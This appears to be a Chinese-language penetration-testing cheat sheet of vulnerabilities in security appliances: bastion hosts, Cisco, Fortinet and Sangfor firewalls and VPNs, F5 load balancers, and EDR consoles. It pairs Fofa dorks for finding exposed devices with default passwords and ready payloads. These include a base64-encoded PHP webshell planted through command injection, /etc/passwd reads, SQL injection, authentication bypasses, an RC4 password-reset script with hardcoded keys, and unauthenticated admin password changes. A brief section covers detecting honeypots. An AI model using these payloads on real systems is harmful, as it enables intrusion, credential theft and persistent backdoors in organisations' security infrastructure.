本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
-
身份与访问控制
-
网络检测与响应
-
终端响应与检测
Fofa: app="齐治科技-堡垒机"
默认口令
- shterm/shterm
齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞
- 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
http://10.20.10.11/listener/cluster_manage.php https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS} /var/www/shterm/resources/qrcode/lbj77.php 密码10086
CNVD-2019-20835 齐治堡垒机前台远程命令执行漏洞
CNVD-2019-17294 齐治堡垒机后台存在命令执行漏洞
远程代码执行
- POC | Payload | exp
POST /shterm/listener/tui_update.php a=["t';import os;os.popen('whoami')#"]
任意用户登录漏洞
- POC | Payload | exp
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
Fofa: app="H3C-SecPath-运维审计系统" && body="2018"
get_detail_view.php 任意用户登录漏洞
- POC | Payload | exp
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
fofa: app="TELEPORT堡垒机"
相关文章
任意用户登录漏洞
- POC | Payload | exp
后台文件读取
- POC | Payload | exp
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
远程代码执行
相关文章
相关工具
- BeichenDream/WhetherMysqlSham - 检测目标 Mysql 数据库是不是蜜罐,获取目标数据库详细信息
- Monyer/antiHoneypot - 一个拦截蜜罐 XSSI 的 Chrome 扩展
- NS-Sp4ce/MoAn_Honey_Pot_Urls - X安蜜罐用的一些存在JSonp劫持的API
从蓝队溯源角度出发
- 分析样本
- PC 名称
- 语言
- 常用函数、方法
- 注释习惯、变量名习惯
- 前端漏洞反制
- 浏览器记录、书签、cookie 等
- 验证码、手机号、邮箱
- 攻击时间段
- 后渗透反制
- 钓鱼文件
- ntlm中继
- Rogue MySql Server
从红队角度出发
- 前台
- 不支持正常浏览器,仅老版 IE
- 仅支持老版本 flash
- 不正常的 JS 文件,js 混淆
- 仅 json 文件, 内含指纹
- XSS、JSONP
- 大量网络请求
- 同站同 CMS 不同页面不同时间、CMS 版本
- 任意口令登录?
- 要求实名认证、或手机号注册
- 后渗透
- 第二次登录后发现 history 记录全部清空
- 开放了大量端口
- docker 容器且无正常业务数据
- 例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的,而这真实的系统中是不可能的。
相关文章
管理员任意登录
- POC | Payload | exp
fofa: app="CISCO-ASA-5520"
CVE-2018-0296 Cisco ASA Directory Traversal
-
相关文章
-
POC | Payload | exp
CVE-2020-3187 任意文件删除
- POC | Payload | exp
CVE-2020-3452
-
描述
Cisco Adaptive Security Appliance (ASA) 防火墙设备以及 Cisco Firepower Threat Defense (FTD)设备的 WEB 管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件,此漏洞不能用于获取对 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件的访问,所以只能读取 web 系统目录的文件,比如 webvpn 的配置文件、书签、网络 cookies、部分网络内容和超文本传输协议网址等信息。
该漏洞源于 ASA 和 FTD 的 web 服务接口在处理 HTTP 请求的 URL 时缺乏正确的输入验证,导致攻击者可以在目标设备上查看系统内的任意文件。
注意:当设备配置了 WebVPN 或 AnyConnect 功能,启用 Web 服务时,才会受到该漏洞影响,但是该漏洞不能用于访问 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件。
-
影响
Cisco ASA 设备影响版本:
- <9.6.1
- 9.6 < 9.6.4.42
- 9.71
- 9.8 < 9.8.4.20
- 9.9 < 9.9.2.74
- 9.10 < 9.10.1.42
- 9.12 < 9.12.3.12
- 9.13 < 9.13.1.10
- 9.14 < 9.14.1.10
-
POC | Payload | exp
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
fofa: app="网康科技-下一代防火墙"
网康下一代防火墙 RCE
- POC | Payload | exp
POST /directdata/direct/router HTTP/1.1 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}访问:https://x.x.x.x/test_test.txt
弱口令
账号:useradmin
密码:venus.user
默认账号密码
User: admin
Pass: hicomadmin
后台命令执行漏洞
系统管理 --> 维护工具 --> Ping
127.0.0.1|cat /etc/passwd
rce
- POC | Payload | exp
CVE-2020-12271 && CVE-2020-15504
相关文章
Fofa : 网康 NS-ASG 安全网关
任意文件读取漏洞
- POC | Payload | exp
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
默认口令
nsroot/nsroot
CVE-2019-19781 Citrix Gateway/ADC 远程代码执行漏洞
-
相关文章
-
POC | Payload | exp
CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞
-
相关文章
-
POC | Payload | exp
CVE-2021-22986 F5 BIG-IP RCE
-
相关文章
-
POC | Payload | exp
CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞
-
镜像下载
-
相关文章
SQL注入漏洞
- POC | Payload | exp
- 天融信Top-app LB负载均衡SQL注入漏洞
POST /acc/clsf/report/datasource.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
- 天融信Top-app LB负载均衡SQL注入漏洞
未授权
- POC | Payload | exp
- 天融信负载均衡TopApp-LB系统无需密码直接登录
登录框 ; ping xxx.dnslog.info; echo
- 天融信负载均衡TopApp-LB系统无需密码直接登录
RCE
- POC | Payload | exp
- 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀
用户名随意 密码:;id
- 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀
fofa: icon_hash="-404383634" app="FORTINET-防火墙"
CVE-2018-13379 Fortigate SSL VPN 密码读取
- POC | Payload | exp
CVE-2018-13382 Fortigate SSL VPN 任意密码重置
- POC | Payload | exp
CVE-2022-40684 FortiOS Authentication Bypass
-
相关文章
-
POC | Payload | exp
- horizon3ai/CVE-2022-40684
git clone https://github.com/horizon3ai/CVE-2022-40684.git cd CVE-2022-40684 ssh-keygen -t rsa python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub ssh admin@1.1.1.1
- horizon3ai/CVE-2022-40684
CVE-2019-1579 Palo Alto GlobalProtect 远程代码执行漏洞
-
相关文章
-
POC | Payload | exp
CVE-2019-11510 Pulse Secure SSL VPN 任意文件读取漏洞
-
相关文章
-
POC | Payload | exp
CVE-2019-11539 Pulse Secure SSL VPN 远程代码执行漏洞
- POC | Payload | exp
常见密码
admin/sangfor@123
sangfor/sangfor
test/test
test1/123456b
口令爆破
- POC | Payload | exp
- https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
用户登录,若多次尝试登录失败会要求输入验证码,若输入错误的验证码,会提示“校验码错误或校验码已过期”;修改登录请求的数据包,清空cookie和验证码字段的值即可绕过验证码,此时提示“用户名或密码错误”。 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
- https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
短信绕过
- POC | Payload | exp
POST https://路径/por/changetelnum.csp?apiversion=1 newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
任意密码重置
- POC | Payload | exp
某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码 利用:需要登录账号 M7.6.6R1版本key为20181118 M7.6.1key为20100720 POST /por/changepwd.csp sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)from Crypto.Cipher import ARC4 from binascii import a2b_hex def myRC4(data, key): rc41= ARC4.new(key) encrypted =rc41.encrypt(data) return encrypted. encode('hex') def rc4_decrpt_hex(data, key): rc41= ARC4. new(key) return rc41. decrypt(a2b_hex(data)) key= '20100720' data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,' print myRC4(data, key)
RCE
-
影响版本
- SSLM7.6.6(20181120)
- SSLM7.6.6R1(20181225)
-
相关文章
-
POC | Payload | exp
https://x.com/por/checkurl.csp?url=http://127.0.0.1;sleep${IFS}5;&retry=0&timeout=1
FOFA: icon_hash="884334722" || title="Ruijie SSL VPN"
锐捷 SSL VPN 越权访问漏洞
-
相关文章
-
POC | Payload | exp
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1 Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1UserName 参数为已知用户名
相关文章
CVE-2020-25223-Sophos UTM WebAdmin 远程命令执行漏洞
相关文章
利用杀毒软件删除任意文件
白名单信任文件
- 相关文章
相关文章
2020.08命令执行
- 相关文章
- POC | Payload | exp
2020.09命令执行
- POC | Payload | exp
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 {"params":"w=123\"'1234123'\"|命令"}
后台任意用户登陆
- POC | Payload | exp
xxx.xxx.xxx.xxx/ui/login.php?user=admin
Fofa: title="360天擎"
前台SQL注入
- POC | Payload | exp
/api/dp/rptsvcsyncpoint?ccid=1
数据库信息泄露漏洞
- POC | Payload | exp
http://x.x.x.x/api/dbstat/gettablessize
Fofa: title="在线安装-V8+终端安全系统Web控制台"
任意文件读取漏洞
- POC | Payload | exp
/htmltopdf/downfile.php?filename=downfile.php
pdf_maker.php 命令执行漏洞
-
相关文章
-
POC | Payload | exp
POST /inter/pdf_maker.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1